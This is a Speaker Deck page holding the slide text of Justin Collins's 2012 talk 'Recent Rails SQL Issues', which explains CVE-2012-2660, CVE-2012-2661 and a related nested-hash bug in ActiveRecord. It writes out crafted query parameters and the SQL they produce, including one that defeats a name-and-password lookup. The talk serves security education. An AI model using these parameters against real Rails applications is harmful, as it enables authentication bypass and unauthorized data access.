Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
65
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
130
The Evolution of Rails Security
presidentbeef
1
790
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
130
Practical Static Analysis for Continuous Application Security
presidentbeef
0
190
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
420
Continuous Security with Practical Static Analysis
presidentbeef
1
300
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
220
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
220
Other Decks in Programming
See All in Programming
複雑なフォームを継続的に開発していくための技術選定・設計・実装 #tskaigi / #tskaigi2025
izumin5210
9
2.6k
TypeScript Language Service Plugin で CSS Modules の開発体験を改善する
mizdra
PRO
2
470
Feature Flag 自動お掃除のための TypeScript プログラム変換
azrsh
PRO
4
220
Global Azure 2025 @ Kansai / Hyperlight
kosmosebi
0
170
「MCPを使ってる人」が より詳しくなるための解説
yamaguchidesu
0
260
事業KPIを基に価値の解像度を上げる
nealle
0
160
技術的負債と戦略的に戦わざるを得ない場合のオブザーバビリティ活用術 / Leveraging Observability When Strategically Dealing with Technical Debt
yoshiyoshifujii
0
120
DevDay2025-OracleDatabase-kernel-addressing-history
oracle4engineer
PRO
1
160
AWS Summit Hong Kong 2025: Reinventing Programming - How AI Transforms Our Enterprise Coding Approach
dwchiang
0
150
Browser and UI #2 HTML/ARIA
ken7253
2
190
コンポーネントライブラリで実現する、アクセシビリティの正しい実装パターン
schktjm
1
240
Building an Application with TDD, DDD and Hexagonal Architecture - Isn't it a bit too much?
mufrid
0
260
Featured
See All Featured
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
227
22k
Gamification - CAS2011
davidbonilla
81
5.3k
4 Signs Your Business is Dying
shpigford
183
22k
For a Future-Friendly Web
brad_frost
177
9.7k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
122
52k
Balancing Empowerment & Direction
lara
0
49
Speed Design
sergeychernyshev
30
950
Why You Should Never Use an ORM
jnunemaker
PRO
56
9.4k
What's in a price? How to price your products and services
michaelherold
245
12k
Measuring & Analyzing Core Web Vitals
bluesmoon
7
440
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
129
19k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
47
2.8k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1